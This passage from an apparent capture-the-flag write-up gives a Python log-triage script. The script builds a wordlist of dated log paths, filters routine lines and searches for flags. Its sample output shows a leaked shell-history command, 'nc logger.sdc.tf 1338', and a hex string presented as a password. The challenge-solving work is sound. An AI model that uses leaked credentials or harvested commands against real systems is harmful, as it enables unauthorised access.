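look like the site's logs; the real ones were fetched with ffuf and wget as
described above.
"""
import os
import re

DAYS = ["Mon", "Tue", "Wed", "Thu", "Thur", "Fri", "Sat", "Sun"]
NOISE = ("SELL", "FIN", "PROC", "LOG", "PROF")  # keywords every routine line carries


def build_wordlist() -> list:
    """Same candidates the writeup typed by hand: day numbers, years, weekday names."""
    return ([str(n) for n in range(32)]
            + [str(y) for y in range(2010, 2023)]
            + [d + ".log" for d in DAYS])


def unusual_lines(logs: dict, noise=NOISE) -> list:
    """(path, line_no, text) for lines matching none of the noise keywords as whole
    words, i.e. what `grep -vrnw "SELL\\|FIN\\|PROC\\|LOG\\|PROF" .` prints."""
    pattern = re.compile(r"\b(?:%s)\b" % "|".join(map(re.escape, noise)))
    hits = []
    for path, text in sorted(logs.items()):
        for n, line in enumerate(text.splitlines(), 1):
            if line.strip() and not pattern.search(line):
                hits.append((path, n, line))
    return hits


def flag_lines(logs: dict) -> list:
    """The direct check first: any line containing an sdctf{...} flag."""
    return [(p, l) for p, t in logs.items() for l in t.splitlines()
            if re.search(r"sdctf\{[^}]*\}", l)]


def load_logs(root: str) -> dict:
    """Read every *.log under `root` into {path: text}."""
    logs = {}
    for d, _, files in os.walk(root):
        for f in files:
            if f.endswith(".log"):
                p = os.path.join(d, f)
                with open(p, errors="replace") as fh:
                    logs[p] = fh.read()
    return logs


# Constructed logs: routine lines plus one leaked shell-history fragment.
SAMPLE_LOGS = {
    "logs/2021/3/Mon.log": "PROC start job 17\nSELL 40 units\nLOG rotated\nPROF build ok\n",
    "logs/2022/4/Fri.log": "FIN quarter closed\nnc logger.sdc.tf 1338\nPROC stop job 17\nLOGIN failed for root\n",
}

if __name__ == "__main__":
    import sys
    logs = load_logs(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOGS
    for path, n, line in unusual_lines(logs):
        print("%s:%d:%s" % (path, n, line))
```

Whole-word matching matters: LOG must not swallow LOGIN, or a leaked login line would be filtered out with the noise.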

so here we can see that some of the bash history is leaked

nc logger.sdc.tf 1338

and a password

82d192aa35a6298997e9456cb3a0b5dd92e4d6411c56af2169bed167b53f38d